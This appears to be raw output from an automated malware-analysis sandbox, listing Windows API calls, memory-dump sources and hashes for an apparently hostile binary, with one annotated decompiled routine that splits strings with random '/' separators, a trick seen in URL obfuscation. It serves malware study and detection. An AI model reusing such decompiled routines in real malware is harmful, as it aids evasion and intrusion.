                              • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 0102EF87
                              • CloseHandle.KERNEL32(?,?,?,?,?), ref: 0102EFAA
                                • Part of subcall function 0103D6A6: GetTickCount.KERNEL32 ref: 0103D6B6
                                • Part of subcall function 0103D6A6: CreateFileW.KERNEL32(01024252,80000000,00000003,01050244,00000003,00000000,00000000,?,00000000,?,01024252), ref: 0103D6D3
                                • Part of subcall function 0103D6A6: GetFileSize.KERNEL32(01024252,00000000,?,00000001,?,00000000,?,01024252), ref: 0103D706
                                • Part of subcall function 0103D6A6: CreateFileMappingA.KERNEL32(01024252,01050244,00000002,00000000,00000000,01024252), ref: 0103D71A
                                • Part of subcall function 0103D6A6: lstrlen.KERNEL32(01024252,?,00000000,?,01024252), ref: 0103D736
                                • Part of subcall function 0103D6A6: lstrcpy.KERNEL32(?,01024252), ref: 0103D746
                                • Part of subcall function 0103D6A6: HeapFree.KERNEL32(00000000,01024252,?,00000000,?,01024252), ref: 0103D761
                                • Part of subcall function 0103D6A6: CloseHandle.KERNEL32(01024252,?,00000001,?,00000000,?,01024252), ref: 0103D773
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                              • String ID:
                              • API String ID: 3239194699-0
                              • Opcode ID: bb66d8d38db86f034d59bd4223499208778cd7fa4db2da5e8590ef2c194665ab
                              • Instruction ID: 6eb9a953c9428e4dbebb1c2f6f9b94c726d0835657622ee770b9213b79cc5ccc
                              • Opcode Fuzzy Hash: bb66d8d38db86f034d59bd4223499208778cd7fa4db2da5e8590ef2c194665ab
                              • Instruction Fuzzy Hash: A6218BB1540218EFEB61DFA9DD44EDEBBF8FF48354F100125F9A992260E7318405CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 01024CF4
                              • lstrlen.KERNEL32(01022C01), ref: 01024D04
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • strcpy.NTDLL ref: 01024D1B
                              • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 01024D25
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AllocateHeaplstrlenmemsetstrcpy
                              • String ID:
                              • API String ID: 528014985-0
                              • Opcode ID: 8869d94d038ece2bed0896e1b0627634517b77ec61d2c669bd076ab138e660a8
                              • Instruction ID: 8ba74b14090bf1d975d42734c3a787b670e6d819df1ccef4f586bc7581efeddb
                              • Opcode Fuzzy Hash: 8869d94d038ece2bed0896e1b0627634517b77ec61d2c669bd076ab138e660a8
                              • Instruction Fuzzy Hash: 1A21D5B9100702AFE3316F68D888B6A7BFCEF44711F108459FAD6C7285EB76D4408721
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 01044BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,01023E20), ref: 01044BF0
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01023E5B
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,010268F0,?), ref: 01023E6D
                              • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,010268F0,?), ref: 01023E85
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,010268F0,?), ref: 01023EA0
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$CloseCreateHandleModuleNamePointerRead
                              • String ID:
                              • API String ID: 1352878660-0
                              • Opcode ID: 22e5aaa6eac8ebedf444746a76c4701721d79ad90ac46cbcba739af154da6e8e
                              • Instruction ID: 89f84aca9c7da7a3399398f343daa7e120d340813d086dbaec888d6603872de5
                              • Opcode Fuzzy Hash: 22e5aaa6eac8ebedf444746a76c4701721d79ad90ac46cbcba739af154da6e8e
                              • Instruction Fuzzy Hash: 001151B1A00128BBDF21AEA9CD88FEF7EADEF45790F104465F655E6090D3359A44CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,00000004,0102B24B,00000004,00000000), ref: 01034B49
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • lstrcpy.KERNEL32(00000000,?), ref: 01034B60
                              • StrChrA.SHLWAPI(00000000,0000002E), ref: 01034B69
                              • GetModuleHandleA.KERNEL32(00000000), ref: 01034B87
                                • Part of subcall function 0102ADDF: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,00000400,?,?,?,00000000,00000000,00000004,0104F518,?,0104F4B4), ref: 0102AEB6
                                • Part of subcall function 0102ADDF: VirtualProtect.KERNELBASE(00000000,00000004,0104F518,0104F518,?,00000000,00000000,00000004,0104F518,?,0104F4B4,00000000,00000002,0104C578,0000001C,0103496D), ref: 0102AED1
                                • Part of subcall function 0102ADDF: RtlEnterCriticalSection.NTDLL(01050460), ref: 0102AEF5
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                              • String ID:
                              • API String ID: 105881616-0
                              • Opcode ID: 49296cd1a7e5f5c392fcef30ee8fe698f71bc22c7155386231a421c970dbbc0d
                              • Instruction ID: 8eba195ad1ba8197b7cb8da06080fb3773f48bde024b825ad972aa84f59dd88c
                              • Opcode Fuzzy Hash: 49296cd1a7e5f5c392fcef30ee8fe698f71bc22c7155386231a421c970dbbc0d
                              • Instruction Fuzzy Hash: 10214874A00205EFDB54DFA8C988BAEBBFCBF84300F148199E986DB250D774D940CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?,00000000,747C8250,747869A0,?,?,?,01025AE4,?,00000000,?), ref: 01032DEE
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,01025AE4,?,00000000,?), ref: 01032E10
                              • lstrcpyW.KERNEL32(00000000,?), ref: 01032E3C
                              • lstrcatW.KERNEL32(00000000,?), ref: 01032E4F
                                • Part of subcall function 010441EE: strstr.NTDLL ref: 010442C6
                                • Part of subcall function 010441EE: strstr.NTDLL ref: 01044319
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                              • String ID:
                              • API String ID: 3712611166-0
                              • Opcode ID: b68f14b635b33a4f343d8f22f565c840bc531f93dbf1a30cb83c6e61716be718
                              • Instruction ID: c1f41e8788196e1215988e8cb35e759eb8d2aa5a690e1c2d91014962b093c9ff
                              • Opcode Fuzzy Hash: b68f14b635b33a4f343d8f22f565c840bc531f93dbf1a30cb83c6e61716be718
                              • Instruction Fuzzy Hash: 541147B6600119BFDB219FA9DC88DEF7BACEF55390B004164FA85D6110D735DA408BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,00000008,00000008), ref: 0103D3B9
                              • RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,00000008,?,00000008), ref: 0103D3DD
                              • RegCloseKey.ADVAPI32(00000008,?,00000008), ref: 0103D435
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,?,00000000,?,00000008), ref: 0103D406
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: QueryValue$AllocateCloseHeapOpen
                              • String ID:
                              • API String ID: 453107315-0
                              • Opcode ID: 7df0511cf3ad7b4e70e72f15366ff8cdaf61738369a9d4f6dccaaa3bfffb13ce
                              • Instruction ID: caf9b5baaf56539a0b3d6b6fb4778402194b92fdc9a957d8a71615bf45b14207
                              • Opcode Fuzzy Hash: 7df0511cf3ad7b4e70e72f15366ff8cdaf61738369a9d4f6dccaaa3bfffb13ce
                              • Instruction Fuzzy Hash: BB21D6B990010DFFDB119F98D9808EEBFBDEF84340F9080A6F941A6114D771AA55DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01030BA2,00000000,?,?,0103F27A,?,04B3C0E0), ref: 01040279
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01040291
                              • memcpy.NTDLL(00000000,04B3C0E0,-00000008,?,?,?,01030BA2,00000000,?,?,0103F27A,?,04B3C0E0), ref: 010402D5
                              • memcpy.NTDLL(00000001,04B3C0E0,00000001,0103F27A,?,04B3C0E0), ref: 010402F6
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memcpy$AllocateHeaplstrlen
                              • String ID:
                              • API String ID: 1819133394-0
                              • Opcode ID: 1ed4b7575e186487246b543a053c629ec16e296b59f1246c1ebea118186ebf6e
                              • Instruction ID: ae1987a153dbe295089fa3f9c81506af7699f2358d4e027c27b289a88c12a7a5
                              • Opcode Fuzzy Hash: 1ed4b7575e186487246b543a053c629ec16e296b59f1246c1ebea118186ebf6e
                              • Instruction Fuzzy Hash: B41159B6A00205AFD7208FA9DCC4D9EBFEEEBC0350B050176F584D7144EA759E008760
                              Uniqueness

                              Uniqueness Score: -1.00%

                               C-Code - Quality: 68%
                               			// Decompiler output (comments added). Takes a NUL-terminated string and
                               			// returns a heap copy in which a '/' is inserted after every chunk of
                               			// 8..23 bytes; chunk lengths come from a linear congruential generator
                               			// whose state lives at 0x13ed288 (multiplier 0x19660d, increment 0x3c6ef35f).
                               			E013E484D(unsigned int __eax, void* __ecx) {
                               				void* _v8;
                               				void* _v12;
                               				signed int _t21;
                               				signed short _t23;
                               				char* _t27;
                               				void* _t29;
                               				void* _t30;
                               				unsigned int _t33;
                               				void* _t37;
                               				unsigned int _t38;
                               				void* _t41;
                               				void* _t42;
                               				int _t45;
                               				void* _t46;
                               
                               				_t42 = __eax;
                               				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);	// lstrlen(__eax); see APIs list below (ref 013E4858)
                               				_t38 = __eax;	// remaining input length
                               				_t30 = RtlAllocateHeap( *0x13ed270, 0, (__eax >> 3) + __eax + 1);	// room for one separator per 8 bytes plus NUL
                               				_v12 = _t30;
                               				if(_t30 != 0) {
                               					_v8 = _t42;	// input read cursor
                               					do {
                               						_t33 = 0x18;	// max chunk window of 24 bytes
                               						if(_t38 <= _t33) {
                               							_t33 = _t38;
                               						}
                               						_t21 =  *0x13ed288; // 0x2a674dbc
                               						_t23 = 0x3c6ef35f + _t21 * 0x19660d;	// LCG step
                               						 *0x13ed288 = _t23;
                               						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;	// chunk length in [8, _t33)
                               						memcpy(_t30, _v8, _t45);
                               						_v8 = _v8 + _t45;
                               						_t27 = _t30 + _t45;
                               						_t38 = _t38 - _t45;
                               						_t46 = _t46 + 0xc;	// cdecl stack cleanup of the memcpy arguments
                               						 *_t27 = 0x2f;	// '/'
                               						_t13 = _t27 + 1; // 0x1
                               						_t30 = _t13;	// output write cursor after the separator
                               					} while (_t38 > 8);
                               					memcpy(_t30, _v8, _t38 + 1);	// copy the tail including the NUL terminator
                               				}
                               				return _v12;
                               			}

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,013EA88E,00000000,?,74785520,013E64DC,?,03AD95B0), ref: 013E4858
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 013E4870
                              • memcpy.NTDLL(00000000,03AD95B0,-00000008,?,?,?,013EA88E,00000000,?,74785520,013E64DC,?,03AD95B0), ref: 013E48B4
                              • memcpy.NTDLL(00000001,03AD95B0,00000001,013E64DC,?,03AD95B0), ref: 013E48D5
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                               • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                               • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                               • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                               • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: memcpy$AllocateHeaplstrlen
                              • String ID:
                              • API String ID: 1819133394-0
                              • Opcode ID: 5a20cc6cecde4ee2af4e9896fca59302f44aa5e5ed069bc8986e009b6263382e
                              • Instruction ID: effc7c1cfd529c2e38e56cd1c6153ad997818bd271115d5504fb5eaa7fa9b06e
                              • Opcode Fuzzy Hash: 5a20cc6cecde4ee2af4e9896fca59302f44aa5e5ed069bc8986e009b6263382e
                              • Instruction Fuzzy Hash: FD11E372A00324ABC7208AA9EC8899EBFEDDB85360F150166E505DB180E6709E04C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GlobalFix.KERNEL32(00000000), ref: 0103E370
                              • memset.NTDLL ref: 0103E384
                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 0103E391
                                • Part of subcall function 01038B6D: OpenProcess.KERNEL32(00000410,0A74F33B,010322DF,00000000,00000000,010322DF,0000001C,00000000,00000000,?,?,?,010322DF), ref: 01038BC7
                                • Part of subcall function 01038B6D: CloseHandle.KERNEL32(00000000,00000000,00000000,010322EF,00000104,?,?,?,010322DF), ref: 01038BE5
                                • Part of subcall function 01038B6D: GetSystemTimeAsFileTime.KERNEL32(010322DF), ref: 01038C4B
                              • GlobalUnWire.KERNEL32(00000000), ref: 0103E3BC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                              • String ID:
                              • API String ID: 3286078456-0
                              • Opcode ID: c1a16061119bb89fecbdc811a6928582acc37ebdebbd517395015657dcfd9647
                              • Instruction ID: 081e139bf60710d7f3699cb6368beacda45f4c3b9d8d56d54c991105abf10050
                              • Opcode Fuzzy Hash: c1a16061119bb89fecbdc811a6928582acc37ebdebbd517395015657dcfd9647
                              • Instruction Fuzzy Hash: 471173F5A00206AFE721ABA8E98CF9E7ABCAF48701F144155E986F2144DB75C5008B65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,0102C682,00000000,00000000), ref: 0103156A
                              • GetLastError.KERNEL32(?,?,?,0102C682,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0102187D,?,0000001E), ref: 01031572
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ByteCharErrorLastMultiWide
                              • String ID:
                              • API String ID: 203985260-0
                              • Opcode ID: 19f5bbb68e4b55fdf72f8b7fc5fbedc482ab9c28f42607c4a3f8fa245a64df6a
                              • Instruction ID: 683b876c319b9aca9e930530f65145906949868432399f6070d51756985f155e
                              • Opcode Fuzzy Hash: 19f5bbb68e4b55fdf72f8b7fc5fbedc482ab9c28f42607c4a3f8fa245a64df6a
                              • Instruction Fuzzy Hash: 8801757A508251FF96319F269C48D6BBBECEBCA760B144A19F5E2921C0D6315800C671
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?), ref: 010269DD
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • mbstowcs.NTDLL ref: 010269F7
                              • lstrlen.KERNEL32(?), ref: 01026A02
                              • mbstowcs.NTDLL ref: 01026A1C
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?,00000000,747869A0,?,00000250,?,00000000), ref: 0103F68B
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?,?,00000000), ref: 0103F697
                                • Part of subcall function 0103F63F: memset.NTDLL ref: 0103F6DF
                                • Part of subcall function 0103F63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0103F6FA
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(0000002C), ref: 0103F732
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?), ref: 0103F73A
                                • Part of subcall function 0103F63F: memset.NTDLL ref: 0103F75D
                                • Part of subcall function 0103F63F: wcscpy.NTDLL ref: 0103F76F
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                              • String ID:
                              • API String ID: 1961997177-0
                              • Opcode ID: 01ca3c39d77af0fa32a8e813469a6edc01b787f4edcf1beadd0656be2ea829ec
                              • Instruction ID: 00d79017b03a93ceb497d8ac084ee89b7949e9b8c1ef27669c101bcadd6e9bf0
                              • Opcode Fuzzy Hash: 01ca3c39d77af0fa32a8e813469a6edc01b787f4edcf1beadd0656be2ea829ec
                              • Instruction Fuzzy Hash: 0B0124B7900216B7DB216BA9DC84FDF7FACEF94310F104026FA8193100EAB6DA0087A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?), ref: 010395B2
                              • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 010395D8
                              • lstrcpy.KERNEL32(00000014,?), ref: 010395FD
                              • memcpy.NTDLL(?,?,?), ref: 0103960A
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AllocateHeaplstrcpylstrlenmemcpy
                              • String ID:
                              • API String ID: 1388643974-0
                              • Opcode ID: 36d275abca7d3af1975ae66aadd78c18c7da63b0d96227e93af2068b3cf757ec
                              • Instruction ID: adb9eb07e0fba63f9d843e43eba4540b329fe97e01595a1a5d7f9bae1604ac06
                              • Opcode Fuzzy Hash: 36d275abca7d3af1975ae66aadd78c18c7da63b0d96227e93af2068b3cf757ec
                              • Instruction Fuzzy Hash: 851149B590160AEFCB21CF58D984A9ABBF8FF48708F10855DF88687210C775E914DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 010345E8
                              • lstrlen.KERNEL32(04B3BF48), ref: 01034609
                              • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 01034621
                              • lstrcpy.KERNEL32(00000000,04B3BF48), ref: 01034633
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                              • String ID:
                              • API String ID: 1929783139-0
                              • Opcode ID: f11725087db766d41fc4d2a36e442e87ae4f0307865620905ce667ad1269de97
                              • Instruction ID: 2b8f7b937d2757b35fd0f494636ee04853e448d4437f3b76560128b8d38b487b
                              • Opcode Fuzzy Hash: f11725087db766d41fc4d2a36e442e87ae4f0307865620905ce667ad1269de97
                              • Instruction Fuzzy Hash: ED01C8B6A00208EFD7219FADA884BAFBFFCAB89301F144068F986D3205D6359505CB75
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • RtlInitializeCriticalSection.NTDLL(01050460), ref: 010445F2
                              • RtlInitializeCriticalSection.NTDLL(01050440), ref: 01044608
                              • GetVersion.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 01044619
                              • GetModuleHandleA.KERNEL32(00001597,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 0104464D
                                • Part of subcall function 0103EFDA: GetModuleHandleA.KERNEL32(?,00000001,77E49EB0,00000000,?,?,00000000,01044630,?,00000000), ref: 0103EFF2
                                • Part of subcall function 0103EFDA: LoadLibraryA.KERNEL32(?), ref: 0103F093
                                • Part of subcall function 0103EFDA: FreeLibrary.KERNEL32(00000000), ref: 0103F09E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                              • String ID:
                              • API String ID: 1711133254-0
                              • Opcode ID: 4b63a823ac81d5156e5d8d31ee5ecb283d17c57bdaff1c6ae186c342683ecacd
                              • Instruction ID: adf7155ea4953d51e954c7e183377c100d9a0c70a388a3bc7f18a4c3b43c0897
                              • Opcode Fuzzy Hash: 4b63a823ac81d5156e5d8d31ee5ecb283d17c57bdaff1c6ae186c342683ecacd
                              • Instruction Fuzzy Hash: F01139F5A80301CFD7A09F69A8C465F3BE8E788314B00452AF9D5C720CDABA58408F55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlEnterCriticalSection.NTDLL(01050488), ref: 01025B58
                              • Sleep.KERNEL32(0000000A,?,?,0103738E,00000000,?,010501F4), ref: 01025B62
                              • SetEvent.KERNEL32(?,?,0103738E,00000000,?,010501F4), ref: 01025BB9
                              • RtlLeaveCriticalSection.NTDLL(01050488), ref: 01025BD8
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSection$EnterEventLeaveSleep
                              • String ID:
                              • API String ID: 1925615494-0
                              • Opcode ID: 2f7a7a583c828366d83caf3e6cf6d28d317ff4f303605d61da52f676159b5f13
                              • Instruction ID: 28f9669e5f4ef144b0a2ce6ee3dd29afc848e371a9de6e6feb9a2bcb32406cca
                              • Opcode Fuzzy Hash: 2f7a7a583c828366d83caf3e6cf6d28d317ff4f303605d61da52f676159b5f13
                              • Instruction Fuzzy Hash: 7E016DB4780314EFEB619B69DC45BAA3AACEB14751F404051F6C5D6089D77A8900CF55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 01033763: lstrlen.KERNEL32(00000000,00000000,00000000,0103FD57,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 01033768
                                • Part of subcall function 01033763: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0103377D
                                • Part of subcall function 01033763: wsprintfA.USER32 ref: 01033799
                                • Part of subcall function 01033763: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 010337B5
                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0103D472
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0103D481
                              • CloseHandle.KERNEL32(00000000), ref: 0103D48B
                              • GetLastError.KERNEL32 ref: 0103D493
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                              • String ID:
                              • API String ID: 4042893638-0
                              • Opcode ID: 23dad962ba23d37378c21890302dcda516f7e261aad9ab53669f2c5a8057a018
                              • Instruction ID: 5e3d1b22b63cc64db7740ce55b4597c152805e714489bc50f347a400078df3bb
                              • Opcode Fuzzy Hash: 23dad962ba23d37378c21890302dcda516f7e261aad9ab53669f2c5a8057a018
                              • Instruction Fuzzy Hash: 73F0D6B1200214BBE3316EA9DCCCEDF7F6CEF91760F508016FACAD2080DA39964087A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • InterlockedExchange.KERNEL32(010500C0,00000000), ref: 0103EB43
                              • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 0103EB5E
                              • lstrcpy.KERNEL32(00000000,?), ref: 0103EB87
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0103EBA8
                                • Part of subcall function 0103E5FC: SetEvent.KERNEL32(?,?,0102EA6E), ref: 0103E611
                                • Part of subcall function 0103E5FC: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0102EA6E), ref: 0103E631
                                • Part of subcall function 0103E5FC: CloseHandle.KERNEL32(00000000,?,0102EA6E), ref: 0103E63A
                                • Part of subcall function 0103E5FC: CloseHandle.KERNEL32(?,?,?,0102EA6E), ref: 0103E644
                                • Part of subcall function 0103E5FC: RtlEnterCriticalSection.NTDLL(?), ref: 0103E64C
                                • Part of subcall function 0103E5FC: RtlLeaveCriticalSection.NTDLL(?), ref: 0103E664
                                • Part of subcall function 0103E5FC: CloseHandle.KERNEL32(?), ref: 0103E680
                                • Part of subcall function 0103E5FC: LocalFree.KERNEL32(?), ref: 0103E68B
                                • Part of subcall function 0103E5FC: RtlDeleteCriticalSection.NTDLL(?), ref: 0103E695
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                              • String ID:
                              • API String ID: 1103286547-0
                              • Opcode ID: c16b54354c19d9df2305ca8022d70d603c37cd9da0dfd1fbcc5b91eba68f5f39
                              • Instruction ID: 3226cbfea45111f01708b7423645cfb288bf3b5b39c317a314fcd9155a04f0d7
                              • Opcode Fuzzy Hash: c16b54354c19d9df2305ca8022d70d603c37cd9da0dfd1fbcc5b91eba68f5f39
                              • Instruction Fuzzy Hash: 5AF0AF35780322BBE7706A65ED49F8B3E59FB80B51F040124F686A7188D97A9805CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrcatW.KERNEL32(00000000,00001000), ref: 01033EF9
                                • Part of subcall function 01026D99: CreateFileW.KERNEL32(00000000,C0000000,010223FB,00000000,010223FC,00000080,00000000,00000000,01048BAA,747869A0,010223FB,?), ref: 01026DDA
                                • Part of subcall function 01026D99: GetLastError.KERNEL32 ref: 01026DE4
                                • Part of subcall function 01026D99: WaitForSingleObject.KERNEL32(000000C8), ref: 01026E09
                                • Part of subcall function 01026D99: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 01026E2A
                                • Part of subcall function 01026D99: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 01026E52
                                • Part of subcall function 01026D99: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 01026E67
                                • Part of subcall function 01026D99: SetEndOfFile.KERNEL32(00000001), ref: 01026E74
                                • Part of subcall function 01026D99: CloseHandle.KERNEL32(00000001), ref: 01026E8C
                              • WaitForSingleObject.KERNEL32(00002710,00000000,00000000,?,00000005,?,0103E92E,?,00000000,00001000,00000000,00000000,00001000), ref: 01033F1C
                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,0103E92E,?,00000000,00001000,00000000,00000000,00001000), ref: 01033F3E
                              • GetLastError.KERNEL32(?,0103E92E,?,00000000,00001000,00000000,00000000,00001000), ref: 01033F52
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                              • String ID:
                              • API String ID: 3370347312-0
                              • Opcode ID: c77a885ebaaf4c9cf309133d2479bc6a8394e0ba16d7e9d3a74210c64db63376
                              • Instruction ID: cca895c0f752255dc52eeef5261cb684156cdb99a0eac3f132c155d3c6b94c27
                              • Opcode Fuzzy Hash: c77a885ebaaf4c9cf309133d2479bc6a8394e0ba16d7e9d3a74210c64db63376
                              • Instruction Fuzzy Hash: AEF0A975280205FFEB221F64ED8AF9E3B69BF46310F100114FBDBA90D0D77A91209B69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,0102556D,000000FF,04B3B7F0,?,?,0103652C,0000003A,04B3B7F0), ref: 0102CFA6
                              • GetLastError.KERNEL32(?,?,0103652C,0000003A,04B3B7F0,?,?,?,0102FFEA,00000001,00000001,04B38560), ref: 0102CFB1
                              • WaitNamedPipeA.KERNEL32(00002710), ref: 0102CFD3
                              • WaitForSingleObject.KERNEL32(00000000,?,?,0103652C,0000003A,04B3B7F0,?,?,?,0102FFEA,00000001,00000001,04B38560), ref: 0102CFE1
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
